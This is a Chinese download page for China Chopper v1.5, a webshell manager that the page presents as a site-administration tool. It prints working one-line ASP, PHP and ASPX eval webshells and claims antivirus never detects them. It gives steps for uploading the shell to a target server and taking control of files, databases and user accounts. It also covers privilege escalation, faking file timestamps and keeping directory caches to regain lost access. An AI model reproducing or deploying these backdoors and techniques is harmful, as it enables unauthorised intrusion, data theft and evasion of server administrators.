详情介绍
中国菜刀 (chopper) 是国内牛人开发的方便的检测后门是否可以利用,方便站长做网站安全检测。最近有好心的朋友提供了我们的一些不维护网站的存在注入问题的几个页面,正好用这个工具检测了下, 要不是服务器安全设置好了, 否则什么都是别人的了。
解压密码:okjb51
如果你是站长,你还在用FTP来管理你的网站吗?
为什么不试一下“中国菜刀”呢,这是一款专业的网站管理工具。
用途广泛,使用方便,小巧实用。
同时,还能连接管理几乎所有主流的数据库。
支持的网站脚本有:PHP,ASP.NET,ASP, 后续将支持其它网站脚本的连接管理。
其它功能:WEB浏览器(POST浏览/自定义COOKIE浏览/自定义JS),网站爬行(自动保存目录结构),WEB安全扫描。
在非简体中文环境下使用,自动切换到英文界面。
说起菜刀,就不得不提起菜刀的作者,作者是一个退伍军人,生长在一个贫穷的农村,据说初中也没读完,英语更是不咋地,但他却自学掌握了
C++/J2ME/PHP/JSP/ASP.NET(C#,VB,C++,delphi,J#)/ASP/MySQL/MsSQL/Oracle/Informix/PostgreSQL/DB2/Sybase/Access/UNIX/LINUX/WIN/SEO/Flash(AS)/PhotoShop/Freehand等等,当初在六七年前台湾闹独立的时候,他在国民党和民进党的网站上留下了“只有一个中国”的黑页,一举成名。
作者是一个朴实,低调的技术牛人,他这些年留下的作品很多,中国菜刀是他最新的一个作品,从他之前的作品WEBSHELL管理器的基础上修改而来,功能更加的强大。
你见过很强大的ASP后门,很强大的PHP后门,很强大的ASPX后门,那你见过很强大的asp,aspx,php三合一后门么........,没有吧,尤其是这个后门,只有一句话。
Asp环境:<%eval request("a")%>
Php环境:<?php @eval($_POST['a']);?>
Aspx环境:<% @page Language="Jscript"><%eval(Request.item["a"],"unsafe");%>
是不是很震憾,很不可思议,是的,我刚接触的时候,也是这样的想法,就这三句话,一个名不见经传的“中国菜刀”,就可以代替我那搜集了几年,大大小小几百个多种平台多种环境的脚本后门?,事实证明,我错了,原来“中国菜刀”不仅仅可以代替那些后门,而且他的功能超出我的想象,就让我慢慢说明吧。
1.就从最基本的讲起,你的脚本是不是经常被杀,你怎么变形都被杀,,传到服务器被杀导致被管理员发现,结果你的权限就没了,杀到你欲哭无泪。菜刀的一句话后门,可以避免这个问题,只有短短的一行代码,永远不会被查杀。
2.你是不是很郁闷你的后门传到服务器上连他妈都不认识了,框架变形,字体变框框,点击菜单无效,这个是因为系统语言不兼容造成的,菜刀是UINCODE方式编译,支持多国语言输入显示,完全不存在兼容性问题。
3.你是不是有很多webshell,你每次都拿记事本记下来,需要的时候,又去翻半天,弄得你很累很没脾气。有了“菜刀”,你可以很方便管理你的webshell,所有的记录都保存在加密的本地数据库里,而且支持webshell分类,让你管理得井井有条。菜刀不仅有临时锁定功能,方便你离开电脑的那小会时间不被别人偷你的webshell,也有加密功能,不输对密码,HOHO,偷了你的数据也没用。
4.再来说说数据库管理,这个是菜刀最最强大的功能,精通各平台主流数据库的作者,把这个功能写的是淋漓尽致。支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等等数据库,支持不是最主要的,功能强大,人性化才是最主要的,“菜刀”的数据库操作界面,内置了常用的数据库语句,非常直观的表列名浏览功能,自动显示表名,列名,查询语句,非常人性化的设计,更内置了不少自建的函数,方便不懂数据库的菜鸟,都能查阅数据库里的数据,再说个“菜刀”数据库管理的一个小技巧,对于access数据库,可以在菜刀的webshell操作界面,对着MDB文件点右键,点Access Management,就直接进入Access的数据库操作界面了,方便吧,嘿嘿!!
5.再说说提权这块,webshell的提权总是最让人关心的,说到提权,就不能说到webshell上的cmd执行了,有些朋友并不了解菜刀的自定义CMD路径功能,有两种方法可以设置指定的cmd路径,一就是在cmd操作界面,输入setp d:\cmd.exe,就可以了,或者把cmd.exe上传到目录,然后点右键,点virtual terminal file,就可以进入自定义CMD.EXE路径的命令行了,同样的,再给个cmd使用的小技巧,在菜刀的命令行里,可以使用cd等命令跳转目录,方便吧,嘿嘿!!嗯,另外,新版菜刀新增常用目录管理功能,你可以把你常用的目录或者提权的目录加进菜刀里,这样很方便你提权或者日常工作,是不是比那些固定了提权目录的脚本后门要牛B的多啊,哈哈。
6.还有菜刀的webshell上的文件功能功能,也是非常人性化的,文件夹和文件的图标完全模枋windows,,文件日期,文件大小,文件权限,一目了然,尤其是修改文件时间功能,非常的方便,直接对着要修改时间的文件点右键,modify the file time,然后在文件的时间那栏,输入时间,回车,就修改完了。当然,菜刀的文件管理还有新建,删除,上传,下载,编辑功能,这些大同小异,就不一一细说了。不过有个功能,还是要重点说明的,那就是目录缓存功能,菜刀可以把浏览过的webshell目录都缓存在本地,这样可以方便下次访问的时候更加快捷,最重要的是,当哪天你的权限丢了,起码你还有对方服务器的文件目录结构,方便再一次渗透。
说完大家都有的脚本后门功能,现在来说点特别的菜刀功能,非常特别跟实用的哦。菜刀的前身是WEBSHELL管理器,再结合了作者之前的web管理软件等几个工具的优点,实在是大杀器的集合体。
使用方法
这里以php为例
首先我们先将php一句话木马上传到目标服务器中,用菜刀去尝试连接
在地址中填写上传一句话木马的地址,在后面的方框中填写所要连接的参数(也就是代码中的’x’)
打开菜刀,空白处右键添加
设置好后我们双击点开
填入地址、密码 等参数
添加完成之后就可以对目标服务器进行控制,可以对文件进行相关的操作,也可以对数据库进行操作,也可以创建一个用户。
我们将a.txt删除,然后去服务器上查看,发现服务器上的a.txt文件也被删除了,这就是利用了上传漏洞进行攻击。
更新日志
最新版本1.5,官方已经无法访问,建议再虚拟机中执行,以防止有后门。
下载地址
人气软件
X-Scan v3.3 好用的端口扫描 简体中文版
入侵扫描工具(SFind.exe) v1.85 绿色版
网络漏洞扫描工具 Acunetix Web Vulnerability Scanner 8.x 全功
WebRobot v1.8.2 网站多功能网络安全渗透检测工具
手工注入帮助系统 t00ls大牛写的
网站漏洞扫描大师 V1.0 中文绿色免费版
安全扫描工具 NetSparker V3.5.4 特别版
MySQL注入检查工具 用了检查程序是否有注入
Marathon Tool 汉化版 基于时间的SQL盲注工具
Acunetix Web Vulnerability Scanner(web漏洞扫描程序) v13.0.2
相关文章
-
HCL AppScan Standard中文补丁 v10.4.0 x64 附教程+中文教程
HCLAppScan Standard中文补丁下载,HCLAppScan Standard 中文激活版是一款市场领先的应用安全软件,强大的 DevSecOps 可查明应用程序漏洞,允许在开发生命周期的每个阶段进...
-
HCL AppScan Standard(web安全漏洞检测工具) v10.4.0 x64 中文免费版 附图文教程
HCLAppScan Standard中文免费版是一款市场领先的应用安全软件,强大的 DevSecOps 可查明应用程序漏洞,允许在开发生命周期的每个阶段进行快速修复,HCL AppScan 提供一流的...
-
Acunetix Web Vulnerability Scanner(web漏洞扫描程序) v13.0.2 中文特别版(附安装教程)
Acunetix Web Vulnerability Scanner是一款web漏洞检测软件,可以帮助用户检测和扫描出web的漏洞,对用户进行提醒,好让用户能及时对漏洞进行修复,欢迎下载使用...
-
WebRobot v1.54 绿色版 (网站注入安全扫描防护工具)
WebRobot仅用于检测Web安全性能,请勿用作非法用途...
-
WebRobot v1.8.2 网站多功能网络安全渗透检测工具
最新版的Webrobot使用的是插件模式,插件存放在主程序目录下的plugin文件夹里,所有插件的配置文件及字典等其他文件也存放在这个文件夹内。我们需要用到哪个插件,只需要双...
-
Acunetix Web Vulnerability Scanner 11.x汉化包中文版(附注册机)
Acunetix Web Vulnerability Scanner 11.x汉化包是最新Acunetix 11的汉化补丁包。新版本集成了漏洞管理功能来扩展企业全面管理、优先级和控制漏洞威胁的能力...
下载声明
☉ 解压密码:www.jb51.net 就是本站主域名,希望大家看清楚,[ 分享码的获取方法 ]可以参考这篇文章
☉ 推荐使用 [ 迅雷 ] 下载,使用 [ WinRAR v5 ] 以上版本解压本站软件。
☉ 如果这个软件总是不能下载的请在评论中留言,我们会尽快修复,谢谢!
☉ 下载本站资源,如果服务器暂不能下载请过一段时间重试!或者多试试几个下载地址
☉ 如果遇到什么问题,请评论留言,我们定会解决问题,谢谢大家支持!
☉ 本站提供的一些商业软件是供学习研究之用,如用于商业用途,请购买正版。
☉ 本站提供的中国菜刀 (chopper) v1.5 网站后门检测利用工具资源来源互联网,版权归该下载资源的合法拥有者所有。